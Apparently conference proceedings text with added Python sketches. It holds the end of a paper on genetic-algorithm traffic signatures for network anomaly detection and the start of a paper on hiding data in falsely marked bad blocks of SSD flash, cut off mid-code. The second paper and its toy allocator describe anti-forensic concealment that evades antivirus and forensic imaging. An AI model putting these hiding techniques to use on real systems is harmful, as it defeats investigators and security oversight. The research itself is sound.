nodes they used) or decremented. The increased concentration of pheromone is an essential factor in the algorithm's
implementation, since it directs ants toward new locations
more likely to yield a near-optimal solution.
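The paper does not give the exact trail equations; a standard ACO-style update — evaporation on every edge, plus a deposit inversely proportional to solution cost on the edges an ant used — would look like:

```python
def update_pheromone(trails, solution_edges, cost, evaporation=0.1, q=1.0):
    """Evaporate all trails (decrement), then reinforce the edges used by
    a solution (increment). Lower-cost solutions deposit more pheromone,
    steering later ants toward more promising regions."""
    for edge in trails:
        trails[edge] *= (1.0 - evaporation)             # evaporation
    for edge in solution_edges:
        trails[edge] = trails.get(edge, 0.0) + q / cost  # deposit

trails = {("a", "b"): 1.0, ("a", "c"): 1.0}
update_pheromone(trails, [("a", "b")], cost=2.0)
# Used edge: 1.0 * 0.9 + 1.0/2.0 = 1.4; unused edge: 0.9.
```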
IV. CREATING A DSNSF-GA
To create our DSNSF-GA, our data were separated into files,
one per day. Every file has 86,400 lines, each corresponding to
the number of bits and packets observed in one second. As we
chose to generate the DSNSF-GA from five-minute
windows, we select 300 lines to generate a single point in
the graph.
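Grouping a day's 86,400 one-second lines into 288 five-minute windows of 300 lines each is a simple slicing step; a sketch:

```python
def five_minute_windows(lines, window=300):
    """Split a day's 86,400 per-second values into 288 windows of 300 s,
    each of which yields one point of the DSNSF."""
    return [lines[i:i + window] for i in range(0, len(lines), window)]

day = list(range(86400))       # stand-in for one value per second
windows = five_minute_windows(day)
```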
These lines were divided and later grouped into clusters
according to the Euclidean distance. Using the Silhouette method
for the interpretation and validation of clusters [18], the best results
were reached with K = 3, and the GA was used to optimize
the distribution among the clusters. Each cluster has a
centroid. As we have three
centroids, we calculate the average of the three,
which in turn should be the point allocated in the middle
of these clusters. At this stage we obtain one point of the
DSNSF-GA.
The operation of DSNSF-GA is shown in Algorithm 2.
The chromosomes are vectors containing the values of
the cluster centroids. The length of a chromosome is defined
by N × K, where N is the number of dimensions of our
search space and K is the number of clusters. As we have
three clusters, we distribute the flow data among them.
Each cluster has its centroid, and these values determine
a single gene in the chromosome.
For the initial population, we randomly generated
forty chromosomes, whose values lie between the
minimum and maximum flow data values. These chromosomes
are used to generate new populations of individuals. The next
step is to determine the fittest individuals in a population.
Algorithm 2 – Using GA to create the DSNSF
Require: Set of bits and packets collected from the historical database; number of clusters, initial population and number of iterations
Ensure: X: vector representing the bits and packets of a day arranged in 288 five-minute intervals, i.e., the DSNSF
1: for i = 1 to 288 do
2:    Initialize population ρ
3:    for t = 1 to number of iterations do
4:       Compute fitness for ρ
5:       Select the fittest using the Roulette Wheel
6:       Apply crossover to generate a new population τ
7:       Apply mutation if necessary
8:       Evaluate solutions through the objective function (1)
9:    end for
10:   Calculate the center of each cluster of the best solution found (fittest)
11:   Xi ← average among the clusters
12: end for
13: return X

Figure 2. DSNSF-GA and ACODS for 2nd of October: bits/s and packets/s traffic of 10/02/2012 and the generated DSNSFs.

As previously described, we used the Roulette Wheel technique
to determine the best chromosomes. Whether an
individual is fit is determined by the total distance between all
points and their respective cluster centroids: if this distance is
lower for one individual than for the others, the data inside
its clusters are better organized, i.e., more points lie close
to the central point of each cluster. In our approach,
we used the sum of the distances of the three clusters to determine
the fittest individuals, which will procreate.
To yield new generations, individuals must mate with
each other. As in nature, the fittest individuals have a greater
probability of generating offspring, which in turn generate
new ones, and so on. When two parents generate a new individual,
they combine their genetic material into a new progeny.
This probabilistic process of breeding a new population by
combining genetic material is the crossover. It is the key
process in a Genetic Algorithm based search, because at this
moment the exchange of genes occurs and the population
is diversified. Since two parents reproduce, they
exchange genetic material and their children are a copy
of the two merged chromosomes, which ensures population
diversity. For our purpose, this exchange of chromosomes
improves the solution, since we are searching for the chromosome
with the shortest total distance. An important part of the
crossover process is defining the crossover point, as we must
choose between single-point and multi-point
crossover. Single-point crossover is indicated for
larger populations, so we chose this technique to divide
our chromosomes. The single point is a random point that
divides the two chromosomes into four pieces (each of them in two) and
combines a pair of those pieces to generate a new one [19].
For an initial population of ρ individuals, we choose the τ =
ρ/2 fittest in this population to generate
a new population. This new population is mixed with the
previous one and breeds others. The Roulette is spun to
choose τ, which will generate other children. Each of these
iterations is called a generation. Since there is no ideal stopping
criterion, a fixed number of iterations is usually adopted. The process
of generating new populations is repeated a fixed number
of times, which we have set to sixty [20].
Each chromosome undergoes mutation with a fixed
probability. Mutation allows the creation and
preservation of genetic variation in a population by introducing
new genetic structures that modify genes inside the chromosome. We establish a mutation rate of 5%. When a mutation
occurs, we choose a mutation point, called MP, at which
the value is changed. The new
value is calculated as New_i = Old_i + (δ × Old_i), where
New_i is the new individual, Old_i is the old individual, and δ is
a random number, 0 < δ < 1. The new chromosome is then used to
generate new offspring.
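The mutation step — a 5% rate, a random mutation point MP, and New_i = Old_i + (δ × Old_i) — can be sketched as follows (the rate=1.0 in the usage line only forces a mutation so its effect is visible):

```python
import random

def mutate(chromosome, rate=0.05):
    """With probability `rate`, pick a mutation point MP and perturb the
    gene there: new = old + delta * old, with delta random in (0, 1)."""
    chromosome = list(chromosome)
    if random.random() < rate:
        mp = random.randrange(len(chromosome))   # mutation point MP
        delta = random.random()                  # 0 < delta < 1
        chromosome[mp] = chromosome[mp] + delta * chromosome[mp]
    return chromosome

random.seed(0)
mutated = mutate([1.0, 2.0, 3.0], rate=1.0)
```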
At the end of all these processes we obtain the best
population. From it, we choose the best individual, which
is the chromosome with the shortest sum of distances between
each point in a cluster and its respective centroid. We
then calculate the mean of the three cluster centroids. This
number represents a single point in the DSNSF-GA, as we
chose to plot one point per five-minute interval.
The process of acquiring each value is repeated for the
other 288 intervals to create a graph representing one day of the
week. As data from three days are used to generate each single
point, we now have a network signature of those days, the
DSNSF-GA.
V. TESTS AND RESULTS
We used a real data set for DSNSF creation. The data
were collected from the State University of Londrina (UEL) and
exported using the sFlow standard. Afterwards, these flows were
divided into files containing 86,400 lines, where each line holds
the value corresponding to one second of a day; one file is for
packets and another for bits. As we have two methods
to compare, it is important to emphasize that we set the
same number of clusters and iterations for both ACODS and
DSNSF-GA.
In Proença et al. [6], a DSNS was created for
each day based on the history of its previous weeks. This
technique was also discussed by Assis et al. [21] and Lima
et al. [22], each of whom used a Digital Signature of
Network Segment to represent network behavior efficiently.
For our purpose, we used only data between 06:00 and 24:00
since we utilized data from a University, whose working
hours are between 07:00 and 23:00. Note that
the 12th of October is a national holiday in Brazil, which is
the reason for the different traffic behavior on that
day. We decided to keep this day to demonstrate the methods'
ability to adapt to such situations.

Figure 3. NMSE and CC for bits per second for DSNSF-GA and ACODS (workdays from 1st to 12th of October).

Figure 5. DSNSF-GA and ACODS for 12th of October (national holiday): bits/s and packets/s traffic of 10/12/2012 and the generated DSNSFs.
Figure 2 shows the observed traffic together with both the
DSNSF-GA and ACODS methods for bits and packets per second.
The figure covers the interval described before, for October
2nd, 2012, where the green line is the current day, and
there are two further lines, one for DSNSF-GA and another for
ACODS. As the figure shows, both methods are able
to characterize the network traffic, following the usual observed
traffic, its increases and decreases in usage, and the
greater use of network resources during the
periods from 07:00 to 12:00 and from 13:00 to 23:00.
To measure the accuracy of each method in generating
DSNSFs, we adopted two different measures: the
Correlation Coefficient (CC) and the Normalized Mean Square
Error (NMSE).
NMSE compares the observed series against the
predicted values, normalized by the variability of the series. If the NMSE is less than 1, the forecasts
perform better than simply predicting the mean of the observed
traffic; if it is greater than 1, they perform worse. The CC measures how well a model fits, with
values ranging from -1 to 1: values close to 1 indicate strong
correlation, while values close to 0 mean weak or no correlation
between the data and the adjusted model.
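One common way to compute the two measures (here NMSE is normalized by the variability of the observed series, so that predicting the plain mean scores exactly 1) is:

```python
from math import sqrt

def nmse(observed, predicted):
    """Normalized mean square error: < 1 beats the constant-mean
    predictor, > 1 is worse than it."""
    mean = sum(observed) / len(observed)
    num = sum((o - p) ** 2 for o, p in zip(observed, predicted))
    den = sum((o - mean) ** 2 for o in observed)
    return num / den

def correlation(observed, predicted):
    """Pearson correlation coefficient, in [-1, 1]."""
    mo = sum(observed) / len(observed)
    mp = sum(predicted) / len(predicted)
    cov = sum((o - mo) * (p - mp) for o, p in zip(observed, predicted))
    so = sqrt(sum((o - mo) ** 2 for o in observed))
    sp = sqrt(sum((p - mp) ** 2 for p in predicted))
    return cov / (so * sp)

obs = [1.0, 2.0, 3.0, 4.0]
perfect = nmse(obs, obs), correlation(obs, obs)
baseline = nmse(obs, [2.5] * 4)   # the constant-mean predictor
```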
Figure 3 indicates that there is correlation between the
observed traffic and the predictions generated by the DSNSF characterization, as the values are close to 1 for both
DSNSF-GA and ACODS. The 12th of October shows poor
correlation, and Figure 5 shows that the traffic was
lower than predicted: this day was a national holiday and
there was little activity at the University. Also in Figure 3,
we observe values of 0.7 and above, meaning that the real traffic and
the DSNSF are correlated, except again on the 12th of October
and on the 5th of October.
We investigated the cause of the poor correlation on the 5th of October. By analyzing log files, the network administrator
discovered a large volume of inbound HTTP traffic,
caused by students applying for new classes of
postgraduate courses. The University was offering 53 new
classes that semester, and it was not only the first day but
also the only way to apply for a class via the Internet. Figure
4 shows the NMSE and CC for packets per second with similar
results, indicating that both methods present good error rates,
achieving average NMSE values of 0.4 including the national
holiday, and less than 0.1 excluding it. In addition, we
get an average correlation of 0.75 with the holiday and 0.8
without it.
Both methods are able to characterize network traffic efficiently, as we can see only a small difference between the predicted
and real traffic on a normal day. Although we have
no threshold to distinguish anomalous from normal behavior,
the figures show that when good values were observed for
CC and NMSE, a normal traffic pattern was also observed.
Abnormal values, after investigation, were found to derive
from anomalous traffic.
Figure 4. NMSE and CC for packets per second for DSNSF-GA and ACODS (workdays from 1st to 12th of October).
A. Computational complexity
The computational complexity of the methods is presented in
asymptotic notation, based on the number of executed instructions.
Initially, the ACODS algorithm partitions a set E of data by
K centers of N dimensions, resulting in O(EKN). Using a
population of M ants to assist the search for the best centers for
grouping the data, and since all ants are compared with each
other in pursuit of the final solution, a quadratic factor is
added, giving O(EKN M²). Taking the number of iterations
T into account as the stopping criterion of the algorithm, we have
a final complexity of O(EKN M²T). Although a maximum
of T iterations is defined, ACODS quickly converges to a
solution.
The selection operator is executed by the Roulette Wheel, one
of the simplest and most traditional methods. As the choice
of a roulette slice is done by a linear search from the
beginning of the list, each selection requires O(ρ) because,
on average, half of the list is searched. In total, the
roulette method takes O(ρ²) steps, since offspring are
bred from crossovers between ρ parents. The crossover
and mutation operations present linear behavior, O(ρ). All
these processes are executed for the N dimensions (bits and
packets). Thereby, the number of operations performed by DSNSF-GA during its iterations is given by O(EKN ρ²T).
VI. CONCLUSION AND FUTURE WORKS
In terms of computational complexity, both methods use
metaheuristic algorithms to find an optimal solution. There
are a number of iterations until a certain condition is reached,
and both methods used the same value.
The DSNSF-GA method, introduced in this paper, uses the
Genetic Algorithm technique to improve data clustering,
and it characterizes network traffic using data collected via
sFlow. To estimate network traffic, we organize the data by simulating
the natural evolution process. Using natural
operators such as selection of the fittest, crossover and mutation,
we obtain the best individuals in a population. We used
the shortest distance between each point in a cluster and its
respective centroid to determine the fittest individual, which
represents a single point in the DSNSF-GA. These digital
network signatures can be used, in the future, by network
administrators to identify anomalous traffic in their environments by comparing the real current traffic with the predicted
traffic. As previously described, when we identified flash
crowd traffic caused by new classes of postgraduate students,
the large inbound traffic was associated with the start of online
applications, and the management of network resources could
then be done automatically.
In future works, we intend to increase the number of
dimensions, including new flow data. This multidimensional
approach will improve traffic characterization, as we will use
more detailed information about the network behavior. Also,
we plan to develop a model to establish a threshold for the
DSNSF, to distinguish anomalous from normal behavior, making
it possible to identify network anomalies in real time.
ACKNOWLEDGMENT
This work was supported by SETI/Fundação Araucária and
MCT/CNPq through the Betelgeuse Project. The
authors also thank São Paulo State Technological College
(Fatec Ourinhos).
REFERENCES
[1] W. Stallings, “SNMPv3: A security enhancement for SNMP,” IEEE Communications Surveys & Tutorials, vol. 1, no. 1, 1998, pp. 2–17.
[2] B. Trammell and E. Boschi, “An introduction to ip flow information
export (ipfix),” IEEE Communications Magazine, vol. 49, no. 4, 2011,
pp. 89–95.
[3] A. Lakhina, M. Crovella, and C. Diot, “Characterization of networkwide anomalies in traffic flows,” in Internet Measurement Conference,
2004, pp. 201–206.
[4] A. Patcha and J.-M. Park, “An overview of anomaly detection techniques: Existing solutions and latest technological trends,” Computer
Networks, vol. 51, no. 12, 2007, pp. 3448–3470.
[5] J. H. Holland, Adaptation in Natural and Artificial Systems: An Introductory Analysis with Applications to Biology, Control and Artificial
Intelligence. Cambridge, MA, USA: MIT Press, 1992.
[6] M. L. Proenca Jr., C. Coppelmans, M. Bottoli, and L. Souza Mendes,
“Baseline to help with network management,” in e-Business and
Telecommunication Networks. Springer Netherlands, 2006, pp. 158–
166.
[7] M. Adaniya, M. Lima, J. Rodrigues, T. Abrao, and M. Proenca Jr.,
“Anomaly detection using dsns and firefly harmonic clustering algorithm,” in Communications (ICC), 2012 IEEE International Conference
on, June 2012, pp. 1183–1187.
[8] M. V. O. Assis, L. F. Carvalho, J. J. P. C. Rodrigues, and M. L.
Proenca Jr., “Holt-winters statistical forecasting and ACO metaheuristic
for traffic characterization,” in Proceedings of IEEE International Conference on Communications, ICC 2013, Budapest, Hungary, June 9-13,
2013, 2013, pp. 2524–2528.
[9] G. Fernandes, A. Zacaron, J. Rodrigues, and M. L. Proenca Jr., “Digital
signature to help network management using principal component
analysis and k-means clustering,” in Communications (ICC), 2013 IEEE
International Conference on, June 2013, pp. 2519–2523.
[10] L. F. Carvalho, A. M. Zacaron, M. H. A. C. Adaniya, and M. L.
Proenca Jr., “Ant colony optimization for creating digital signature of
network segments using flow analysis,” in 31st International Conference
of the Chilean Computer Science Society, SCCC 2012, Valparaı́so,
Chile, November 12-16, 2012, 2012, pp. 171–180.
[11] U. Maulik and S. Bandyopadhyay, “Genetic algorithm-based clustering
technique,” Pattern Recognition, vol. 33, no. 9, 2000, pp. 1455–1465.
[12] J. Xiaopei, W. Houxiang, H. Ruofei, and L. Juan, “Improved genetic
algorithm in intrusion detection model based on artificial immune
theory,” in Computer Network and Multimedia Technology, 2009.
CNMT 2009. International Symposium on, Jan 2009, pp. 1–4.
[13] H. Guo, W. Chen, and F. Zhang, “Research of intrusion detection based
on genetic clustering algorithm,” in Consumer Electronics, Communications and Networks (CECNet), 2012 2nd International Conference on,
April 2012, pp. 1204–1207.
[14] M. Mitchell, An introduction to genetic algorithms. MIT Press, 1998.
[15] M. Dorigo, G. D. Caro, and L. M. Gambardella, “Ant algorithms for
discrete optimization,” Artificial Life, vol. 5, 1999, pp. 137–172.
[16] H. Jiang, Q. Yu, and Y. Gong, “An improved ant colony clustering
algorithm,” in Biomedical Engineering and Informatics (BMEI), 2010
3rd International Conference on, vol. 6, oct. 2010, pp. 2368 –2372.
[17] M. Dorigo, M. Birattari, and T. Stutzle, “Ant colony optimization,”
Computational Intelligence Magazine, IEEE, vol. 1, no. 4, nov. 2006,
pp. 28 –39.
[18] P. J. Rousseeuw, “Silhouettes: A graphical aid to the interpretation and
validation of cluster analysis,” Journal of Computational and Applied
Mathematics, vol. 20, no. 0, 1987, pp. 53 – 65.
[19] W. M. Spears and V. Anand, “A study of crossover operators in genetic
programming,” in ISMIS, 1991, pp. 409–418.
[20] C. A. Murthy and N. Chowdhury, “In search of optimal clusters using
genetic algorithms,” Pattern Recognition Letters, vol. 17, no. 8, 1996,
pp. 825–832.
[21] M. V. d. Assis, J. J. Rodrigues, and M. L. Proenca Jr., “A sevendimensional flow analysis to help autonomous network management,”
Information Sciences, vol. 278, no. 0, 2014, pp. 900 – 913.
[22] M. Lima, L. Sampaio, B. Zarpelão, J. Rodrigues, T. Abrao, and M. L.
Proenca Jr., “Networking anomaly detection using dsns and particle
swarm optimization with re-clustering,” in Global Telecommunications
Conference (GLOBECOM 2010), 2010 IEEE, Dec 2010, pp. 1–6.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
DeadDrop-in-a-Flash: Information Hiding at SSD NAND Flash Memory
Physical Layer
Avinash Srinivasan and Jie Wu
Panneer Santhalingam and Jeffrey Zamanski
Temple University
Computer and Information Sciences
Philadelphia, USA
Email: [avinash, jiewu]@temple.edu
George Mason University
Volgenau School of Engineering
Fairfax, USA
Email: [psanthal, jzamansk]@gmu.edu
Abstract—The research presented in this paper, to
the best of our knowledge, is the first attempt at
information hiding (IH) at the physical layer of a Solid
State Drive (SSD) NAND flash memory. SSDs, like
HDDs, require a mapping between Logical Block
Addressing (LBA) and the physical media. However, the
mapping on SSDs is significantly more complex and is
handled by the Flash Translation Layer (FTL). FTL
is implemented via a proprietary firmware and serves
to both protect the NAND chips from physical access
as well as mediate the data exchange between the
logical and the physical disk. On the other hand, the
Operating System (OS), as well as the users of the SSD
have just the logical view and cannot bypass the FTL
implemented by a proprietary firmware. Our proposed
IH framework, which requires physical access to NAND
registers, can withstand any modifications to the logical
drive, which is accessible by the OS as well as users.
Our framework can also withstand firmware updates
and is 100% imperceptible in the overt-channels. Most
importantly, security applications such as anti-virus,
cannot detect information hidden using our framework
since they lack physical access to the NAND registers.
We have evaluated the performance of our framework
through implementation of a working prototype, by
leveraging the OpenSSD project, on a reference SSD.
Keywords—Anti-forensics; Covert Communication;
Information Hiding; Security; Solid State Drives.
I. Introduction
In IH, the majority of research has focused on steganography,
the concept of hiding information in innocuous existing files. There
has also been considerable research on hiding information within file systems.
The advent of SSDs, among other things, has also created
new attack vectors from the view point of IH. However,
little research exists in regards to IH on SSDs. From an IH
view point, the combination of simplicity, standardization,
and ubiquity of the traditional Hard Disk Drive (HDD)
poses a major challenge. The lack of complex abstraction
between physical and logical drive, detailed information
on the structure of almost all file systems in use, along
with open source tools enabling physical access to HDDs as
well as analyzing and recovering both deleted and hidden
data makes IH on the HDDs futile. This can be noted
from the file system-based IH technique proposed in [1],
which utilizes fake bad blocks. Although this sounds like
a generic solution, since it is specific to file systems and
independent of the storage media, in reality it cannot be used
for IH on SSDs, because there the mapping of logical blocks
to physical flash memory is controlled by the FTL. Our
proposed solution is 100% filesystem- and OS-independent,
providing a lot of flexibility in implementation. Note that
throughout this paper, the term “physical layer” refers
to the physical NAND flash memory of the SSD, and
readers should not confuse it with the Open Systems
Interconnection (OSI) model physical layer.
Traditional HDDs, since their advent more than 50
years ago, have seen the least advancement among storage
hardware, storage densities excepted. Meanwhile,
the latency gap between Random Access Memory (RAM)
and HDDs has continued to grow, leading to an ever-increasing demand for high-capacity, low-latency storage,
to which the answer was SSDs. While flash memory has
served this purpose for many years in specialized commercial and military applications, its cost has only recently
decreased to the point where flash memory-based SSDs are
replacing traditional HDDs in consumer-class Personal
Computers (PCs) and laptops. Our proposed framework
can operate under two different scenarios: 1) a user hides
information strictly for personal use; 2) a group of users
collude, with the SSD as the DeadDrop [2], and any user
can hide a secret message which can later be retrieved by
another user with the appropriate map-file.
In contrast to traditional HDDs, SSDs introduce significant complexities [3] including: 1) An inability to support
in-place data modification; 2) Incongruity between the
sizes of a “programmable page” and an “erasable block”;
3) Susceptibility to data disturbances; and 4) Imposing
an upper bound on their longevity due to progressive wear
and/or degradation of flash cells. While these complexities
are inevitable to provide the expected performance and
longevity from SSDs, they also pair well with the notion of
IH. These complexities, if exploited effectively, can provide
highly secure and robust IH.
Another technique noted by Wee [1], similar to our
proposed data hiding methodology, is to provide the
file system with a list of false bad clusters. The
file system then skips these clusters when storing new
data, so they can be safely used for IH. Nonetheless,
in all of the aforementioned techniques, the entire HDD
can be easily read and analyzed for the existence of hidden
information using both open source and commercial tools.
SSDs, however, have posed the biggest hurdle
faced by the digital forensics community [4][5]. Hence,
our proposed approach is very robust to detection and/or
destruction, depending on the motive of the user.
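The false-bad-blocks idea can be illustrated with a toy allocator; every name and structure below is hypothetical, for illustration only — it models the principle, not the actual FTL or file-system code:

```python
class ToyVolume:
    """Toy model of a storage volume whose allocator skips clusters
    marked bad. Clusters *falsely* marked bad become a covert store:
    the normal write path never touches them, but the hider can still
    read and write them directly."""

    def __init__(self, n_clusters):
        self.clusters = [None] * n_clusters
        self.bad = set()

    def mark_bad(self, cluster):
        """Record a false bad-cluster entry."""
        self.bad.add(cluster)

    def allocate(self, data):
        """Normal write path: first free cluster not marked bad."""
        for i, content in enumerate(self.clusters):
            if content is None and i not in self.bad:
                self.clusters[i] = data
                return i
        raise RuntimeError("volume full")

    def hide(self, cluster, secret):
        """Covert write path into a cluster the allocator will avoid."""
        assert cluster in self.bad
        self.clusters[cluster] = secret

vol = ToyVolume(4)
vol.mark_bad(0)                              # falsely declare cluster 0 bad
slot = vol.allocate("ordinary file data")    # lands in cluster 1, not 0
vol.hide(0, "secret")                        # covert data survives allocation
```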
A. Assumptions and Threat Model
We assume that there is a key exchange protocol as well
as a Public Key Infrastructure (PKI) in place and known to
all participants including the adversary. Figure 1 captures
the basic idea of our IH framework. Alice and Bob are two
users who wish to exchange secret messages in the presence of
the adversary Eve. With our proposed framework, shown
in Figure 1, they can securely exchange secret messages
using the SSD as the DeadDrop. Additionally, they need
to exchange the corresponding map-file generated during
the hiding process. While several different approaches exist
very popular PKI approach in our discussions. The tools
for hiding and retrieving secret messages on the SSD are
available to both Alice and Bob. If Eve wishes to extract
the secret message from the SSD, then she will need both
of these – the tool for retrieving the secret message and
the corresponding map-file. While obtaining the tool is
very hard, it cannot be completely disregarded. On the
other hand, obtaining the map-file can be safely ruled
out, particularly owing to the strong security properties
of the underlying PKI system that strengthens session
initiation with end user authentication with the help of
digital certificates. If Eve, somehow, gets access to the SSD
physically, she might try the following attacks. We discuss
our defense mechanisms against these attacks in Section VI-A.
Attack-1: Get a complete logical image of the drive using
any available disk imaging tool.
Attack-2: Try to destroy the drive by erasing it.
Attack-3: Get a physical image of the entire drive.
Attack-4: Launch a Man-in-the-Middle attack to sniff the
map-file, and subsequently apply it to the drive.
Fig. 1. Hide-in-a-Flash Threat Model.
For any IH scheme to be effective, two key features are
expected to be satisfied: 1) confidentiality of the hidden
message; and 2) integrity of the hidden message. Most
importantly, a critical feature for an effective IH scheme is
that it should conceal the very fact that a secret message is
hidden. Our proposed framework achieves all three of these
properties. We use Elliptic Curve Cryptography (ECC)
algorithms for encryption, decryption, digital signatures,
and key exchange. ECC algorithms are chosen for the
strong cryptographic properties they provide with small
key sizes. As noted by Rebahi et al. [6], a 160-bit ECC key
provides security equivalent to RSA with 1024-bit keys.
Our proposed "Hide-in-a-Flash" IH framework for
SSDs differs from existing techniques proposed for traditional
HDDs in several key aspects that are discussed
throughout this paper. However, we have identified those
that are pivotal to our research and present them in
our list of contributions below and in Section III-A.
B. Our Contributions
Our contributions, at the time of this writing and to
the best of our knowledge, can be summarized as follows:
• This is the first attempt at IH on SSDs at the
NAND flash memory physical layer. We have successfully
implemented our secure IH technique on the reference OCZ
Vertex Series SATA II 2.5" SSD. The algorithms used in
our framework are wear-leveling compliant and do not
impact the SSD's longevity. Additionally, our implementation
of the framework does not affect the data integrity and
performance of the SSD.
• We have adapted the code from the OpenSSD
project to bypass the FTL with Barefoot Controller
firmware, which otherwise completely prevents access to
physical flash memory.
• The proposed IH framework is very robust and
secure – it can be implemented to be 100% undetectable
without prior knowledge of its use, and 100% resistant to
manufacturer's updates, including destructive SSD
firmware updates that would completely thwart the proposed
IH framework. Most importantly, it is 100% transparent
to the user, the OS, and even the FTL.
• Our approach hides information within "false bad
blocks" tracked by the FTL in its bad block list,
thereby preventing any operations on those blocks
and making it resistant to updates or overwriting.
• Our framework does not exploit the file system's
data structures to hide information, nor does it hide
data in the various slack spaces and unallocated space
of a drive [7]. Consequently, it does not break the
information to be hidden into bits and pieces.
• We have successfully identified functionalities of
the firmware that are not part of OpenSSD's documentation
through firmware reverse engineering. We are working
toward making this information publicly available
through the OpenSSD project website, so that
others can continue their research using it as a baseline.
• Finally, by leveraging the OpenSSD framework, we
have designed a tool that can acquire a physical image
of an SSD (with a Barefoot flash controller), which we
have tested during our evaluations. However, a few minor
firmware functionalities are yet to be built into this tool.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
C. Road Map
The remainder of this paper is organized as follows. We
begin with a review of relevant related works in Section II.
In Section III, we provide a background discussion on
SSDs, specifically focusing on their departure from traditional HDDs. We also discuss the OpenSSD platform in
this section. Section IV investigates various design choices
we had to make in designing our system. Later, Section V
presents details of the proposed IH framework, followed by
the evaluation methods used and an analysis of the results in
Section VI. Finally, in Section VII, we conclude this paper.
II. Related Work
All existing work on IH targets HDDs; none is specific
to SSDs. Among the techniques for HDDs, the notable
ones revolve around hiding information within existing
file systems, in slack space and unallocated space.
Verhasselt [8] examines the basics of these techniques.
Another technique, as noted in [1], is similar to our
proposed data hiding methodology, and is to provide the
file system with a list of false bad clusters. Subsequently,
the file system discounts these blocks when hiding new
data, and as such can be safely used for IH. Nonetheless,
in all of the aforementioned techniques, the entire HDD
can be easily read and analyzed for the existence of hidden
information using both open source and commercial tools.
However, SSDs have posed the biggest hurdle
faced by the digital forensics community [4][5]. Hence,
our proposed approach is very robust to detection and/or
destruction, depending on the motive of the user.
According to McDonald and Kuhn [9], cryptographic
file systems provide little protection against legal or illegal
instruments that force data owners to release decryption
keys once the presence of encrypted data has been established. Therefore, they propose StegFS, a steganographic
file system, which hides encrypted data inside unused
blocks of a Linux ext2 file system.
RuneFS [10] hides files in blocks that are assigned to
the bad blocks inode, which happens to be inode 1 on ext2.
Forensic programs are not specifically designed to look at
the bad blocks inode. Newer versions of RuneFS also encrypt
files before hiding them, making it a twofold problem. On
the other hand, FragFS [11] hides data within the Master
File Table (MFT) of a New Technology File System
(NTFS) volume. It scans the MFT for suitable entries
that have not been modified within the last year. It then
calculates how much free space is available and divides it
into 16-byte chunks for hiding data.
Khan et al. [12] have applied steganography to hard
drives. Their technique overrides the disk controller chip
and positions the clusters according to a code, without
which, hidden information cannot be read. In [13], the authors
propose a new file system vulnerability, DupeFile, which
can be exploited for IH. The proposed approach hides
data in plain sight on the logical disk by simply renaming
a malicious file with the same name as that of an existing
good file. Since the renaming is done at the raw disk level,
the OS does not alert the end user to such file
hiding. In another IH method, in [14], the authors propose
information hiding in file slack space. This technique,
called HideInside, splits a given file into chunks, encrypts
them, and randomly hides them in the slack space of different
files. The proposed technique also generates a map-file
that resides on a removable media, which will be used for
retrieval and reconstruction of the randomly distributed
encrypted chunks.
In [15], Nisbet et al. analyze the usage of TRIM as
an Anti-Forensics measure on SSDs. They have conducted
experiments on different SSDs running different operating
systems, with different file systems to test the effectiveness
of data recovery in TRIM-enabled SSDs. Based on their
experiments, it can be concluded that, with TRIM enabled,
forensic investigators will be able to recover the deleted
data only for a few minutes from the time the TRIM command
was issued.
Wang et al. [16] have successfully hidden and recovered
data from flash chips. Here, the authors use the term "flash
chips" to refer to removable storage devices like USB flash
drives. They use variation in the program time of a group
of bits to determine if a given bit is a 0 or a 1. They
convert the data to be hidden into bits and determine
the blocks required. The authors have come up with a method
to program a group of bits, overcoming the default
page-level programming. While their method is quite robust,
it suffers from a significant downside: the amount
of information that can be hidden. Their method can
hide up to 64 MB of data on a 32 GB flash drive, while
our proposed IH can hide up to 2 GB of information on a
32 GB SSD – a 32-fold increase in the hiding capacity of
the channel.
III. SSD Background
In contrast to the mechanical nature of traditional
HDDs, an SSD is essentially a circuit board containing
numerous flash memory packages and a controller that
facilitates the interface between the OS and the physical
flash memory. SSDs may utilize either NOR flash or
NAND flash memory. As the latter is relatively cheap,
it is widely used in consumer SSDs.
A. Salient Features
Below is a list of salient features of SSDs:
1. Flash Memory: At the lowest level, each flash memory package contains thousands of cells, each capable of
holding one or more bits. While read and write operations
on a cell are relatively fast, physical limitations imposed
by the storage medium necessitate cell erasure before
overwriting it with new information. Flash memory cells
are logically grouped into pages. A page is the basic unit
of reading and writing. Pages are grouped into blocks,
which are the basic unit of erasure. Blocks are grouped into
dies, and dies are grouped into flash memory packages, also
known as banks. Within an SSD, multiple flash memory
packages are grouped to provide the total capacity of the drive.
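The cell-page-block-die-bank hierarchy can be made concrete with a short sketch that multiplies out a drive's raw capacity from its geometry. The parameter values below are illustrative assumptions modeled on the reference drive, not a general rule:

```python
# Illustrative sketch: deriving raw SSD capacity from its flash geometry.
# The parameter values are assumptions modeled on the reference drive.

def raw_capacity_bytes(banks, dies_per_bank, blocks_per_die,
                       pages_per_block, data_bytes_per_page):
    """Multiply out the hierarchy: banks -> dies -> blocks -> pages -> bytes."""
    return (banks * dies_per_bank * blocks_per_die *
            pages_per_block * data_bytes_per_page)

capacity = raw_capacity_bytes(banks=8, dies_per_bank=2, blocks_per_die=4096,
                              pages_per_block=128, data_bytes_per_page=4096)
print(capacity // 2**30, "GiB")  # 32 GiB of addressable flash
```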
2. Flash Translation Layer (FTL): In order to manage
the complexities of the physical layout, optimize the use
and endurance of the flash memory, and provide the
OS with the traditional block device interface of storage
devices, SSDs contain a controller which implements an
additional layer of abstraction beyond traditional HDDs
TABLE I. REFERENCE SSD OCZ VERTEX SPECIFICATION
Total number of banks: 8
Dies per Bank: 2
Blocks per Die: 4096
Pages per Block: 128
Cells per Page: 17,256
Bits per Cell: 2
Cell Type: 2-level cells
Total Size: 32 GB
Advertised capacity: 30 GB
Over-provisioning: 2 GB
known as the FTL. Below are the three fundamental operations of the FTL – 1) logical to physical block mapping;
2) garbage collection; and 3) wear leveling.
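The first of these operations can be thought of as a dictionary from logical block addresses to physical pages: flash cannot overwrite in place, so each rewrite goes to a fresh page and the old page is merely invalidated, which is what later makes garbage collection necessary. The following is a simplified sketch, not the Barefoot implementation:

```python
# Simplified FTL sketch: logical-to-physical mapping with out-of-place
# writes. Real FTLs (e.g., the Barefoot firmware) are far more involved;
# this only illustrates why garbage collection is needed.

class ToyFTL:
    def __init__(self):
        self.l2p = {}          # logical address -> physical page
        self.invalid = set()   # physical pages holding stale data
        self.next_free = 0     # next never-written physical page

    def write(self, logical_addr):
        if logical_addr in self.l2p:
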